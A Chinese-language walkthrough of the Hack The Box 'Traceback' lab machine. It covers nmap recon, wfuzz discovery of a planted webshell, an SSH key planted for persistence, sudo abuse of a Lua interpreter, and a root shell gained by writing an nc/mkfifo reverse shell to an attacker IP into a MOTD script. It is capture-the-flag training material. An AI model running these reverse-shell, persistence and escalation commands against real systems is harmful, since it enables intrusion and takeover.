Hack The Box - Traceback

概述

目标靶机是一台Linux机器，部署了一个网站，但是网站被人日了，黑客留下了一些线索和工具在服务上，我们需要利用这些线索和工具拿到root和flag。先通过社工找到黑客的信息，从他的github上找到一些webshell的线索，然后用wfuzz找到黑客传到目标站点的webshell，利用webshell可以拿到webadmin账号权限，然后通过主机上的线索找到一个执行lua脚本提升权限的通道进而获取到另一个高权限的账号sysadmin，再通过pspy监控发现本地有一些使用特权执行的定时任务脚本，修改脚本执行反弹shell获取到root权限。

信息收集

root@vultr:~/htb# nmap -sV -sC 10.10.10.181
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-28 08:06 UTC
Nmap scan report for 10.10.10.181
Host is up (0.076s latency).
Not shown: 984 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
416/tcp   filtered silverplatter
1011/tcp  filtered unknown
1130/tcp  filtered casp
1521/tcp  filtered oracle
2119/tcp  filtered gsigatekeeper
3476/tcp  filtered nppmp
4900/tcp  filtered hfcs
5440/tcp  filtered unknown
5903/tcp  filtered vnc-3
6580/tcp  filtered parsec-master
7741/tcp  filtered scriptview
8292/tcp  filtered blp3
32773/tcp filtered sometimes-rpc9
52869/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.32 seconds

用浏览器访问目标网站，发现页面已经被人日了，从页面留下的信息看Xh4H可能是黑客的名字(目标网站是80段，我本地做了映射)

web.png

google这个名字找到了对方的github账号，里面有一个工程Web-Shells。根据目标网站的提示，说黑客留了一些后门在这里，索性把这个工程下的webshell名字作为字典尝试爆破目录

root@vultr:~/htb# cat fuzz.txt
alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

爆破

使用wfuzz爆破目录，果然找到对方使用的webshell文件smevk.php

root@vultr:~/htb# wfuzz -w ./fuzz.txt -u http://10.10.10.181/FUZZ --hc 404,403

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.181/FUZZ
Total requests: 17

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000017:  C=200     44 L      151 W         1113 Ch        ""
000015:  C=200     58 L      100 W         1261 Ch        "smevk.php"

Total time: 0.241917
Processed Requests: 17
Filtered Requests: 15
Requests/sec.: 70.27192

用浏览器访问之，发现是一个功能很全面的webshell，查看发现当前用户是webadmin，为了保证连接的稳定性，我们在/home/webadmin/.ssh下面放一个公钥，本机利用私钥登录

webshell

先在本机生成公私钥对

root@vultr:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:2YE9x2+Eyr/bU1JkYYAbvgxxVvScvIBB1kV0qBUnWR0 root@vultr.guest
The key's randomart image is:
+---[RSA 2048]----+
|          .+=+BEB|
|         +.*ooOo*|
|        . O.*+.B |
|         = B.o. o|
|        S * . oo |
|           + .. .|
|            .  o |
|             o.  |
|            o... |
+----[SHA256]-----+
root@vultr:~# ls -l /root/.ssh/
total 12
-rw------- 1 root root 1823 May 28 08:39 id_rsa
-rw-r--r-- 1 root root  398 May 28 08:39 id_rsa.pub
-rw-r--r-- 1 root root  666 May 28 03:03 known_hosts

把公钥的文件的内容copy出来，保存成文件authorized_keys，然后利用webshall直接上传至/home/webadmin/.ssh，接下来就可以直接用私钥+ssh登录了。
在家目录下找到一些线索，note.txt提到了lua，然后我们在.bash_history找到了一些操作记录，看起来是要使用/home/sysadmin/luvit执行privesc.lua脚本，但是经过一通查找，却并没有找到这两个文件的位置，并且webadmin账号没有权限读取sysadmin下面的文件

#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu May 28 01:48:57 2020 from 10.10.14.101
webadmin@traceback:~$ whoami
webadmin
webadmin@traceback:~$
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout

提权

使用sudo -l查看发现，我们要找的问题件可以无密码读取，正好这个时候不知道哪位老哥在家目录下创建了一个lua文件获取bash，内容就一句话os.execute("/bin/bash")。
根据前面获得的提示，执行 sudo -u sysadmin /home/sysadmin/luvit script.lua可以直接切到sysadmin的bash，移动到sysadmin的家目录可以获取到user.txt

webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit  script.lua
sysadmin@traceback:~$ whoami
sysadmin
sysadmin@traceback:~$ cd ../sysadmin
sysadmin@traceback:/home/sysadmin$ ls -la
total 4336
drwxr-x--- 5 sysadmin sysadmin    4096 Mar 16 03:53 .
drwxr-xr-x 4 root     root        4096 Aug 25  2019 ..
-rw------- 1 sysadmin sysadmin       1 Aug 25  2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin    3771 Apr  4  2018 .bashrc
drwx------ 2 sysadmin sysadmin    4096 Aug 25  2019 .cache
drwxrwxr-x 3 sysadmin sysadmin    4096 Aug 24  2019 .local
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24  2019 luvit
-rw-r--r-- 1 sysadmin sysadmin     807 Apr  4  2018 .profile
drwxr-xr-x 2 root     root        4096 Aug 25  2019 .ssh
-rw------- 1 sysadmin sysadmin      33 May 28 01:33 user.txt
sysadmin@traceback:/home/sysadmin$

接下来要尝试获取root权限，这里用到pspy监视进程，这个工具可以在普通用户权限下观察到其他用户执行的命令
观察一会发现，目标机器每30秒会执行一个cp命令，把一些文件从backup目录复制到/etc/update-motd.d/

/bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

image.png

移动到这个目录下，发现000-header里面的内容正好就是ssh登录的时候显示的信息，并且从pspy监控的信息看来，当用ssh登录的时候这里会自动执行sh -c uname -a; w; id; /bin/sh -i正好与这个脚本吻合，可以在后面加一行id来验证

sysadmin@traceback:~$ cd /etc/update-motd.d/
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release


echo "\nWelcome to Xh4H land \n"
id

image.png

最后，我们可以确定ssh登录时候会触发用root执行这个脚本，所以我们在这里加一个nc的反弹shell，在00-header里面添加rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.94 8888 >/tmp/f

同时在本机开启监听nc -lvp 8888，获取到root的反弹shell

image.png